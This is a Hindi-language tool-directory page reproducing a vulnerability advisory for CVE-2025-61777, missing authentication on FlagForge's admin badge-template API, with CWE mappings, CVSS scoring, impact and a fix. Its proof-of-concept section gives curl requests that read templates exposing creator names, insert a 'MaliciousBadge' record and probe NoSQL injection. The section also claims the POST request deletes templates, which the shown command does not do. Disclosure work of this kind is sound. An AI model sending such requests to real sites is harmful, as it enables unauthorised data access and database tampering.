Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-61777 — CVE on FlagForgeCTF संस्करण v2.0.0 से v2.3.1 तक। समस्या को ठीक करने के लिए संस्करण 2.3.2 में अपग्रेड किया गया। | Kitploit
उपकरण/GitHubGitHub/0x0w1z/cve-2025-61777
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगAPI सुरक्षा
GitHub0x0w1z/cve-2025-61777

CVE-2025-61777

CVE on FlagForgeCTF संस्करण v2.0.0 से v2.3.1 तक। समस्या को ठीक करने के लिए संस्करण 2.3.2 में अपग्रेड किया गया।

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-61777

1. FlagforgeCTF पर बैज टेम्पलेट्स का अनधिकृत संशोधन CVE-2025-61777

सारांश

Flagforge एप्लिकेशन (https://flagforge.xyz) अपने प्रशासनिक API एंडपॉइंट्स, विशेष रूप से /api/admin/badge-templates (GET) और /api/admin/badge-templates/create (POST) में गंभीर कमजोरियाँ उजागर करता है। दोनों एंडपॉइंट्स में प्रमाणीकरण और प्राधिकरण नियंत्रण का अभाव है, जिससे बिना प्रमाणित उपयोगकर्ता संवेदनशील बैज टेम्पलेट डेटा प्राप्त कर सकते हैं और MongoDB डेटाबेस में मनमाने टेम्पलेट बना सकते हैं। इससे अनधिकृत डेटा एक्सपोज़र, डेटाबेस प्रदूषण, या बैज सिस्टम का दुरुपयोग (जैसे, दुर्भावनापूर्ण या स्पैम टेम्पलेट बनाना) हो सकता है।

विवरण

प्रभावित एंडपॉइंट्स

  1. GET /api/admin/badge-templates:
    • MongoDB badgeTemplates संग्रह में संग्रहीत सभी बैज टेम्पलेट्स की एक JSON सरणी लौटाता है।
    • उजागर फ़ील्ड्स में _id, name, description, icon, color, isActive, createdBy, createdAt, updatedAt, और __v शामिल हैं।
    • कोई प्रमाणीकरण हेडर, API कुंजी, या सत्र जाँच की आवश्यकता नहीं है, जिससे एंडपॉइंट सार्वजनिक रूप से सुलभ हो जाता है।
    • नमूना प्रतिक्रिया (cURL से):
root@kitploit:~
    x0w1z   ~  curl -i https://flagforge.xyz/api/admin/badge-templates
HTTP/2 200
access-control-allow-origin: https://flagforge.xyz
age: 0
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
content-type: application/json
date: Sat, 27 Sep 2025 11:17:35 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/admin/badge-templates
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::kbnlf-1758971855497-e981648f08c6
x-xss-protection: 1; mode=block
{"success":true,"templates":[{"_id":"68d18c6b3ddde4c2825273a1","name":"Staff","description":"Awarded for behind-the-scenes work that powers the community forward.","icon":"/badges/images/badge-1758563431839-63u7vxws5u.png","color":"#8B5CF6","isActive":true,"createdBy":"Lagzen Thakuri","createdAt":"2025-09-22T17:50:35.138Z","updatedAt":"2025-09-22T17:50:35.138Z","__v":0},{"_id":"68d18c073ddde4c282527398","name":"Bug Hunter","description":"Awarded for sharp eyes and a hacker’s mindset in finding weaknesses.","icon":"/badges/images/badge-1758563324750-h7zfukwxw7.png","color":"#8B5CF6","isActive":true,"createdBy":"Lagzen Thakuri","createdAt":"2025-09-22T17:48:55.675Z","updatedAt":"2025-09-22T17:48:55.675Z","__v":0},{"_id":"68ccfd395b3791025b51c200","name":"Security Researcher","description":"Earned by pushing boundaries and digging deeper into security.","icon":"/badges/custom/badge-1758264629375-0y4fdhdxjy5.png","color":"#8B5CF6","isActive":true,"createdBy":"[email protected]","createdAt":"2025-09-19T06:50:33.108Z","updatedAt":"2025-09-19T06:50:33.108Z","__v":0}],"count":3}%
  1. POST /api/admin/badge-templates/create:
    • उपयोगकर्ता-नियंत्रित फ़ील्ड्स: name, description, icon, color, isActive, और createdBy के साथ नए बैज टेम्पलेट्स के निर्माण की अनुमति देता है।
    • name, description, और icon की उपस्थिति के लिए न्यूनतम सत्यापन जाँच, और यह सुनिश्चित करता है कि कोई डुप्लिकेट name मौजूद न हो।
    • कोई प्रमाणीकरण या प्राधिकरण जाँच नहीं, जिससे कोई भी डेटाबेस में डेटा डाल सकता है।
    • नमूना कोड (प्रदान किए गए स्रोत से):
      root@kitploit:~
      const templateDoc = {
        name: name.trim(),
        description: description.trim(),
        icon: icon.trim(),
        color: color || '#8B5CF6',
        isActive: isActive !== undefined ? isActive : true,
        createdAt: new Date(),
        createdBy: createdBy || 'unknown'
      };
      const result = await db.collection('badgeTemplates').insertOne(templateDoc);
      

कमजोरियाँ

  • CWE-200: अनधिकृत अभिनेता को संवेदनशील जानकारी का एक्सपोज़र (GET एंडपॉइंट): उपयोगकर्ता पहचानकर्ताओं (जैसे, Lagzen Thakuri, [email protected]) और मेटाडेटा को उजागर करता है, जिससे टोही या फ़िशिंग संभव होती है।
  • CWE-306: महत्वपूर्ण फ़ंक्शन के लिए लापता प्रमाणीकरण (दोनों एंडपॉइंट्स): प्रशासनिक मार्गों पर कोई एक्सेस नियंत्रण नहीं।
  • CWE-284: अनुचित एक्सेस नियंत्रण (दोनों एंडपॉइंट्स): अनधिकृत डेटा पुनर्प्राप्ति और संशोधन की अनुमति देता है।
  • संभावित NoSQL इंजेक्शन: जबकि POST एंडपॉइंट स्पष्ट रूप से फ़ील्ड्स को विघटित करता है, GET एंडपॉइंट कमजोर हो सकता है यदि यह क्वेरी पैरामीटर (जैसे, ?name[$ne]=test) का समर्थन करता है।
  • लॉग प्रदूषण जोखिम: POST एंडपॉइंट उपयोगकर्ता-नियंत्रित name और createdBy को लॉग करता है, जिसका दुरुपयोग लॉग स्पैम या इंजेक्शन के लिए किया जा सकता है।

CVSS v3.1 स्कोर

  • आधार स्कोर: 9.1 (गंभीर)
  • वेक्टर: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    • अटैक वेक्टर (AV): नेटवर्क (सार्वजनिक रूप से सुलभ एंडपॉइंट्स)।
    • अटैक जटिलता (AC): कम (कोई विशेष शर्तें आवश्यक नहीं)।
    • आवश्यक विशेषाधिकार (PR): कोई नहीं (कोई प्रमाणीकरण आवश्यक नहीं)।
    • उपयोगकर्ता इंटरैक्शन (UI): कोई नहीं (सीधे HTTP अनुरोध)।
    • स्कोप (S): अपरिवर्तित (एप्लिकेशन को ही प्रभावित करता है)।
    • गोपनीयता (C): उच्च (उपयोगकर्ता डेटा उजागर करता है)।
    • अखंडता (I): उच्च (मनमाना डेटा निर्माण की अनुमति देता है)।
    • उपलब्धता (A): कम (बड़े पैमाने पर टेम्पलेट निर्माण के माध्यम से संभावित DoS)।

प्रभावित सिस्टम

  • एप्लिकेशन: Flagforge (https://flagforge.xyz)
  • घटक:
    • Next.js API मार्ग: /api/admin/badge-templates (GET) और /api/admin/badge-templates/create (POST)।
    • MongoDB डेटाबेस: badgeTemplates संग्रह।
  • होस्टिंग: Vercel (सर्वरलेस, server: Vercel हेडर से अनुमानित)।
  • संस्करण: अज्ञात (माना जाता है कि NextRequest/NextResponse सिंटैक्स के आधार पर Next.js 13+)।
  • निर्भरताएँ: MongoDB ड्राइवर (कस्टम @/utlis/db कनेक्ट उपयोगिता के माध्यम से), Next.js।

प्रभाव

  • गोपनीयता: उपयोगकर्ता पहचानकर्ताओं (createdBy) और मेटाडेटा (createdAt, updatedAt) का एक्सपोज़र, जिसका उपयोग सोशल इंजीनियरिंग या लक्षित हमलों के लिए किया जा सकता है।
  • अखंडता: बैज टेम्पलेट्स का अनधिकृत निर्माण, संभावित रूप से एप्लिकेशन में स्पैम, फ़िशिंग, या दुर्भावनापूर्ण सामग्री प्रदर्शन की ओर ले जाता है।
  • उपलब्धता: POST एंडपॉइंट को टेम्पलेट निर्माणों से भरकर संभावित डेनियल-ऑफ-सर्विस (DoS), डेटाबेस संसाधनों की खपत।
  • शोषण क्षमता: उच्च, क्योंकि एंडपॉइंट्स बिना किसी प्रमाणीकरण बाधा के सरल HTTP अनुरोधों (जैसे, cURL, Postman) के माध्यम से सार्वजनिक रूप से सुलभ हैं।

प्रूफ ऑफ कॉन्सेप्ट

  1. संवेदनशील डेटा पुनर्प्राप्त करें (GET):

    root@kitploit:~
    curl https://flagforge.xyz/api/admin/badge-templates
    
    • सभी बैज टेम्पलेट्स की एक JSON सूची लौटाता है, जिसमें createdBy (जैसे, [email protected]) जैसे संवेदनशील फ़ील्ड्स शामिल हैं।
  2. अनधिकृत टेम्पलेट बनाएं (POST) और टेम्पलेट्स हटाएं (DELETE):

    root@kitploit:~
    curl -X POST https://flagforge.xyz/api/admin/badge-templates/create \
      -H "Content-Type: application/json" \
      -d '{"name":"MaliciousBadge","description":"Hacked","icon":"evil.svg","createdBy":"attacker"}'
    
    • badgeTemplates संग्रह में एक नया टेम्पलेट बनाता है।
    • बैज टेम्पलेट्स को हटाता है।
    • नए टेम्पलेट की उपस्थिति की पुष्टि करने के लिए GET अनुरोध को फिर से चलाकर सत्यापित करें।
  3. संभावित NoSQL इंजेक्शन (GET, यदि क्वेरी पैरामीटर समर्थित हैं):

    root@kitploit:~
    curl https://flagforge.xyz/api/admin/badge-templates?name[$regex]=.*
    
    • परीक्षण करें कि क्या एंडपॉइंट MongoDB ऑपरेटरों को संसाधित करता है, जो फ़िल्टर को बायपास कर सकता है या अतिरिक्त डेटा उजागर कर सकता है।

सिफारिशें

तत्काल सुधार

  1. प्रमाणीकरण लागू करें:
    • दोनों एंडपॉइंट्स के लिए उपयोगकर्ता पहचान सत्यापित करने के लिए मिडलवेयर जोड़ें (जैसे, JWT, NextAuth.js, या API कुंजी)।
      root@kitploit:~
      // POST एंडपॉइंट के लिए उदाहरण मिडलवेयर
      export async function POST(request: NextRequest) {
        const authHeader = request.headers.get('authorization');
        if (!authHeader || !verifyToken(authHeader)) { // verifyToken लागू करें
          return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });
        }
        // ... मौजूदा कोड ...
      }
      
  2. GET एंडपॉइंट प्रतिबंधित करें:
    • GET एंडपॉइंट को प्रमाणित व्यवस्थापकों तक सीमित करें या न्यूनतम डेटा लौटाएं (जैसे, createdBy को बाहर करें)।
    • यदि क्वेरी पैरामीटर समर्थित हैं, तो NoSQL इंजेक्शन को रोकने के लिए इनपुट को साफ़ करें।

संदर्भ

  • CWE-200: https://cwe.mitre.org/data/definitions/200.html
  • CWE-306: https://cwe.mitre.org/data/definitions/306.html
  • CWE-284: https://cwe.mitre.org/data/definitions/284.html
  • OWASP API Security Top 10: https://owasp.org/www-project-api-security/
  • CVSS v3.1 Calculator: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
टूल डाउनलोड करें